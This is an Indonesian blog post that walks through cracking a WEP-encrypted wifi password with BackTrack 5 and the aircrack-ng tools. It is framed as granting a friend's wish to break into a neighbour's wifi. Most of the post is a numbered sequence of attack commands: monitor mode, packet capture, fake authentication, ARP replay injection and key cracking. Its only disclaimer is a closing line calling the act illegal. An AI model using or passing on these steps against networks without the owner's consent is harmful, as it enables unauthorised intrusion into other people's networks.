crack password wifi menggunakan backtrack 5




  Selamat pagi sobat berbagi ilmu,menanggapi permintaan teman saya yang berinisial "ugeh" yang dari kemarin kepengen banget bisa meretas password wifi tetangga hahahaha dan memaksa saya untuk menshare tutorial cara crack password wifi kali ini akan saya kabulkan permintaan nya itu.pada artikel kali ini saya akan membagikan cara crack password wifi yang terenkripsi WEP.gak usah pake lama langsung liat aja ke bawah.
Langkah-langkah nya adalah sebagai berikut :

1.Booting backtrack 5 di laptop mu,lalu isikan username : root dan password nya : toor dan untuk memulai nya ketikan startx.

2.Setelah masuk ke dekstop backtrack 5,buka konsole/terminal baru kemudian ketikan airmon-ng

3.Maka akan muncul nama wireless card laptop kita,antara lain wlan0 dan eth0

4.Di laptop saya menggunakan wlan0,lalu ketikan airmon-ng start wlan0 (gunakan sesuai dengan nama wireless card sobat).

5.Sekarang akan terbentuk mode monitor (mon0),sobat bisa melihatnya dengan mengetikan perintah iwconfig

6.Langkah selanjutnya adalah memonitoring wifi yang ada di sekitar kita dengan cara ketikan perintan pada terminal airodump-ng mon0.Pada langkah ini semua jaringan wifi yang ada di sekitar kita ini akan termonitor di airodump,pilih jaringan wifi yang terenkripsi WEP,setelah anda temukan tekan ctrl + C untuk mengakhiri pencarian jaringan wifi.

7.Selanjutnya kita lakukan pengambilan data dengan airodump yaitu dengan ketikan perintah airodump-ng mon0 --bssid(bssid target) -c (channel) -w (file name to save)
contoh : sebagai target adalah hotspot saya sendiri,nama hotspot kurnia7 fighter,enkripsi WEP,channel 2 bssid 23:A4:22:D4:2e:5t.Maka perintah yang harus di ketikan adalah airodump-ng mon0 --bssid 23:A4:22:D4:2e:5t -c 2 -w kurnia7 fighter WEP.Biarkan console tetap terbuka.

8.Langkah berikutnya adalah buka konsole baru dan ketikan aireplay-ng -1 3 -a (bssid target) (interface)
contoh : aireplay-ng -1 3 -a  23:A4:22:D4:2e:5t mon0.

9.Kemudian waktu nya generate packet ketikan perintah ini pada konsole aireplay-ng 3 -b (bssid target) -h (alamat wireless card(mon0)) (interface).
contoh : aireplay-ng 3 -b 23:A4:22:D4:2e:5t  -h 00:11:22:33:44:55 mon0
tunggu hingga mendapatkan packet 25000 hingga 90000 setelah pas tekan tombol ctrl+C

10.Langkah terakhir gunakan aircack untuk mencrack password wifi target,ketikan perintah berikut ini aircrack-ng kurnia7 fighter WEP-0.1-cap
maka proses cracking di mulai,tunggu hingga aircrack mendapatkan password nya.jika sukses maka password akan telihat.

    Sekian tutorial crack wifi dari saya ,semoga bermanfaat bagi sobat,crack wifi merupakan tindakan ilegal,gunakan atas resiko sendiri terima kasih,klik fanspage kami atau tulis komentar setelah membaca artikel ini.

HAPPY BLOGGING

Sumber : KURNIA ADITAMA (STMIK AMIKOM PURWOKERTO)


No comments for "crack password wifi menggunakan backtrack 5"